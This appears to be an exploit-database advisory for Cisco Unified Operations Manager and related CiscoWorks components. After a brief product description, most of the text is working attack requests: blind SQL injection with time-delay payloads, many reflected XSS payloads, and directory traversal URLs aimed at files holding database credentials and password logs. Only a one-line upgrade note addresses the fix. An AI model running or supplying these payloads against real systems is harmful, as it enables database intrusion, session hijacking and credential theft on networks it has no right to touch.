Cisco Unified Operations Manager (CuOM) is a NMS for voice developed by Cisco Systems. Operations Manager monitors and evaluates the current status of both the IP communications infrastructure and the underlying transport infrastructure in your network.
Multiple vulnerabilities have been identified in Cisco Unified Operations Manager and associated products. These vulnerabilities include:
- multiple blind SQL injections
- multiple XSS
- directory traversal vulnerability
Below the source of the exploit (Only for test!).
Blind SQL injection vulnerabilities that affect CuOM (CVE-2011-0960):
The Variable CCMs of PRTestCreation can trigger a blind SQL injection vulnerability by supplying a single quote, followed by a time delay call:
/iptm/PRTestCreation.do?RequestSource=dashboard&MACs=&CCMs='waitfor%20delay'0:0:20'--&Extns=&IPs=
Additionally, variable ccm of TelePresenceReportAction can trigger a blind SQL injection vulnerability by supplying a single quote:
/iptm/TelePresenceReportAction.do?ccm='waitfor%20delay'0:0:20'--
Reflected XSS vulnerabilities that affect CuOM (CVE-2011-0959):
/iptm/advancedfind.do?extn=73fcb</script><script>alert(1)</script>23fbe43447
/iptm/ddv.do?deviceInstanceName=f3806"%3balert(1)//9b92b050cf5&deviceCapability=deviceCap
/iptm/ddv.do?deviceInstanceName=25099<script>alert(1)</script>f813ea8c06d&deviceCapability=deviceCap
/iptm/eventmon?cmd=filterHelperca99b<script>alert(1)</script>542256870d5&viewname=device.filter&operation=getFilter&dojo.preventCache=1298518961028
/iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)</script>09520eb762c&dojo.preventCache=1298518963370
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84"%3balert(1)//608ddbf972
/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8"%3balert(1)//79877affe89
/iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae4c
/iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7
Reflected XSS vulnerability that affect Common Services Device Center (CVE-2011-0962):
/CSCOnm/servlet/com.cisco.nm.help.ServerHelpEngine?tag=Portal_introductionhomepage61a8b"%3balert(1)//4e9adfb2987
Reflected XSS vulnerability that affects Common Services Framework Help Servlet (CVE-2011-0961):
/cwhp/device.center.do?device=&72a9f"><script>alert(1)</script>5f5251aaad=1
Directory traversal vulnerability that affects CiscoWorks Homepage (CVE-2011-0966):
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\boot.ini
cmfDBA user database info:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\MDC\Tomcat\webapps\triveni\WEB-INF\classes\schedule.properties
DB connection info for all databases:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\lib\classpath\com\cisco\nm\cmf\dbservice2\DBServer.properties
DB password change log:
http://target:1741/cwhp/auditLog.do?file=..\..\..\..\..\..\..\ProgramFiles\CSCOpx\log\dbpwdChange.log
Solution: Upgrade to CuOM 8.6.
References: http://www.exploit-db.com/exploits/17304/